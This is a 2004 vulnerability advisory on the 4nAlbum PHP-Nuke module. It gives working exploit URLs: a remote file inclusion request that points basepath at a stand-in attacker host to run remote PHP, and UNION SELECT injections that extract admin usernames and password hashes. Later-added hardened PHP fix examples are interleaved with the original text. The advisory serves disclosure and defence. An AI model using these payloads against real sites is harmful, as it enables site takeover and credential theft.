waraxe-2004-SA006.txt

waraxe-2004-SA006.txt
Posted Mar 17, 2004
Authored by Janek Vind aka waraxe

The 4nalbum module for PHP-Nuke versions 6.5 to 7.0 suffers from path disclosure, cross site scripting, remote file inclusion, and SQL injection vulnerabilities.

tags | exploit, remote, php, vulnerability, xss, sql injection, file inclusion
SHA-256 | b72910a8ea7f3795a3370ca420ebdd0d9f784cdcd93d78ee2fde747165559de9

{================================================================================}
{ [waraxe-2004-SA#006] }
{================================================================================}
{ }
{ [ Multiple vulnerabilities in 4nalbum module for PhpNuke ] }
{ }
{================================================================================}

Author: Janek Vind "waraxe"
Date: 15. March 2004
Location: Estonia, Tartu




Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From developer's infofile:

4nAlbum Version 0.92 (German & English) for phpNUKE Version 6.5 - 7.0 (http://phpnuke.org)
By WarpSpeed (Marco Wiesler) (warpspeed@4thDimension.de) @ Nov/2oo3 http://www.warp-speed.de
@ 4thDimension.de Networking

With this addon/module for phpNUKE you can offer a comfortable
(Media) Album to your users.

- Creating infinite categories and subcategories
- Comfortable administration functions with help texts
- Upload of media files for members/guests possible (can be deactivated)
- etc.




Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1. Full path disclosure:

Requesting the URL below produces a standard PHP error message that discloses the full filesystem path.
This is a frequently underestimated security flaw: it gives a potential attacker vital information
needed for further attacks. For example, if an SQL injection bug can be exploited and the logged-in
MySQL user has FILE privileges, the exact full path is needed to successfully create or read a file.

Examples:

http://localhost/nuke71/modules/4nalbum/public/displaycategory.php





2. Remote file inclusion:

A remote attacker can make a GET or POST request with a specially crafted parameter, and the victim
server will include a file from the remote server, so the attacker can make the victim server parse any
PHP code the attacker wants. Of course, if the web server is located behind a properly configured firewall,
or if the php.ini configuration contains "allow_url_fopen = Off", then this does not work...


Examples:

First upload a file named "fileFunctions.php" to www.attacker.com. Then make the request:

http://localhost/nuke71/modules/4nalbum/public/displaycategory.php?basepath=http://www.attacker.com/


This is the original code from displaycategory.php:

...

include ("$basepath/public/imageFunctions.php");
include ("$adminpath/fileFunctions.php");

function getThumbnail($img, $galloc) {
global
...
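As an added example (not 4nAlbum's code and not from the advisory author), the block below puts the register_globals-era include pattern quoted above beside a hardened version that pins both include roots to the module's own directory, and it also handles the error-message path disclosure from section 1 by logging PHP errors server-side instead of echoing them. The directory layout and the log file path are assumptions.

```php
<?php
// Added example, not 4nAlbum's code. Directory layout and log path are
// assumptions for illustration.

// Section 1: keep PHP's own error text (which embeds absolute paths) out of
// HTTP responses and write it to a server-side log instead.
ini_set('display_errors', '0');
ini_set('log_errors', '1');
ini_set('error_log', '/var/log/php/nuke-errors.log');   // assumed path

// Section 2, vulnerable pattern. With register_globals=On, a request such as
// ?basepath=http://attacker.example/ defines $basepath before this line, so
// the include resolves to a remote URL (allow_url_fopen=On) or to any local
// file the web server can read:
//
//     include("$basepath/public/imageFunctions.php");
//     include("$adminpath/fileFunctions.php");

// Hardened pattern: derive both roots from this file's own location so no
// request variable can influence them, then verify each include target
// still resolves inside the module before including it.
$basepath  = dirname(__FILE__) . '/..';    // modules/4nalbum       (assumed)
$adminpath = $basepath . '/admin';         // modules/4nalbum/admin (assumed)

function include_within($root, $relative)
{
    $root_real   = realpath($root);
    $target_real = realpath($root . '/' . $relative);

    // realpath() returns false for missing files and for anything that is
    // not a plain local path, so a URL can never get past this point.
    if ($root_real === false || $target_real === false) {
        error_log("include refused, target missing: $relative");
        exit;
    }
    // The canonical target must start with the root plus a separator; this
    // also blocks "../" escapes, which realpath() has already collapsed.
    $prefix = $root_real . DIRECTORY_SEPARATOR;
    if (strncmp($target_real, $prefix, strlen($prefix)) !== 0) {
        error_log("include refused, outside module root: $target_real");
        exit;
    }
    return include $target_real;
}

include_within($basepath,  'public/imageFunctions.php');
include_within($adminpath, 'fileFunctions.php');
```

The refusal branches deliberately log and stop without printing the offending path, so a probe for the include flaw does not turn into the path disclosure described in section 1.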






3. Cross-Site scripting aka XSS

XSS is useful for stealing cookies, which leads to bypassing authentication and taking over
the website (if the attacker can obtain the admin's cookies).


Example:


http://localhost/nuke71/modules/4nalbum/public/nmimage.php?z=[xss code here]

Because PhpNuke filters some important symbols from GET requests, a POST request is needed.
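As an added example (not 4nAlbum's code), the block below shows a hardened handling of the "z" parameter from the request above. How nmimage.php actually uses the value, the session cookie name and the allowed character set are assumptions; the point is that encoding on output, not the symbol filtering on GET input that the advisory notes can be bypassed with POST, is what closes the hole.

```php
<?php
// Added example, not 4nAlbum's code. The parameter name "z" is the one from
// the advisory; the cookie name and the allowed character set are assumptions.

// Vulnerable pattern: request data echoed into HTML unchanged.
//
//     echo "<img src=\"" . $z . "\">";

// 1. Reduce what a successful script injection could steal: mark the session
//    cookie HttpOnly (PHP >= 5.2) so document.cookie cannot read it. Must be
//    sent before any output. Arguments: name, value, expire, path, domain,
//    secure, httponly.
$cookie_value = 'PLACEHOLDER_SESSION_TOKEN';                 // assumed
setcookie('album_session', $cookie_value, 0, '/', '', false, true);

// 2. Read the value explicitly from the request instead of relying on
//    register_globals, and accept only what the page needs (an image name).
//    Reading $_REQUEST covers both the GET and the POST route.
$z = isset($_REQUEST['z']) ? $_REQUEST['z'] : '';
if (!preg_match('/\A[A-Za-z0-9_.-]{1,64}\z/', $z)) {
    header('HTTP/1.0 400 Bad Request');
    exit;                      // no echo of the rejected value
}

// 3. Encode on output regardless of the check above, so a later change to
//    the allowed characters cannot reopen the hole. ENT_QUOTES also covers
//    attributes delimited with single quotes.
function h($s)
{
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

echo '<img src="' . h($z) . '" alt="' . h($z) . '">';
```

The whitelist in step 2 and the encoding in step 3 are independent layers: either one alone stops the injection shown above, and keeping both means a mistake in one does not immediately become exploitable.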




4. SQL injection

This is my favourite ;) - easy to exploit and the effect is devastating.
Try this:

http://localhost/nuke71/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-99%20UNION%20SELECT%20null,null,pwd,2,null,null,null%20FROM%20nuke_authors/*

and this:

http://localhost/nuke71/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-99%20UNION%20SELECT%20null,null,aid,2,null,null,null%20FROM%20nuke_authors/*


and you will see the admin's password MD5 hash and username. This is enough to handcraft the cookie and bypass authentication ;)
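As an added example (not 4nAlbum's code), the block below shows the two fixes that stop the gid injection above: enforcing the integer type before the value gets near the database, and binding it as a parameter so it can never be parsed as SQL. The table and column names and the connection details are placeholders.

```php
<?php
// Added example, not 4nAlbum's code. Table and column names and the
// connection details are placeholders.

// Vulnerable pattern: $gid comes straight from the query string, so
//     gid=-99 UNION SELECT null,null,pwd,2,null,null,null FROM nuke_authors/*
// is spliced into the statement as SQL, and the trailing "/*" comments out
// whatever the original query had after the id:
//
//     $result = mysql_query("SELECT * FROM nuke_4nalbum_gallery WHERE gid=$gid");

// Fix 1: enforce the type. A gallery id is a small non-negative integer;
// anything else is rejected before it reaches the database.
function read_gallery_id($raw)
{
    if (!is_string($raw) || !ctype_digit($raw) || strlen($raw) > 9) {
        return null;   // "-99 UNION ...", "", "1e3" and "12abc" all land here
    }
    return (int) $raw;
}

$gid = read_gallery_id(isset($_GET['gid']) ? $_GET['gid'] : '');
if ($gid === null) {
    header('HTTP/1.0 400 Bad Request');
    exit;              // say nothing about the value and nothing about file paths
}

// Fix 2: a parameterised query, so the value is never parsed as SQL even if
// the type check is loosened later. Selecting only the columns the page
// needs also keeps the result shape from being a useful UNION target.
$db = new mysqli('localhost', 'nuke_user', 'PLACEHOLDER', 'nuke');   // placeholders
if ($db->connect_error) {
    error_log('db connect failed: ' . $db->connect_error);
    exit;
}

$stmt = $db->prepare('SELECT gid, title, owner FROM nuke_4nalbum_gallery WHERE gid = ?');
$stmt->bind_param('i', $gid);   // 'i' binds the value as an integer
$stmt->execute();
$stmt->bind_result($row_gid, $title, $owner);
while ($stmt->fetch()) {
    echo htmlspecialchars($title, ENT_QUOTES, 'UTF-8'), "\n";
}
$stmt->close();
```

Fix 1 alone would already defeat the payload quoted in the advisory, but it depends on every caller remembering to apply it; the bound parameter in fix 2 makes the statement safe by construction, which is why a codebase with many such queries should adopt it everywhere rather than patch one endpoint.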





Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to ulljobu, djzone, raider and to all IT freaks in Estonia!



Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

---------------------------------- [ EOF ] ------------------------------------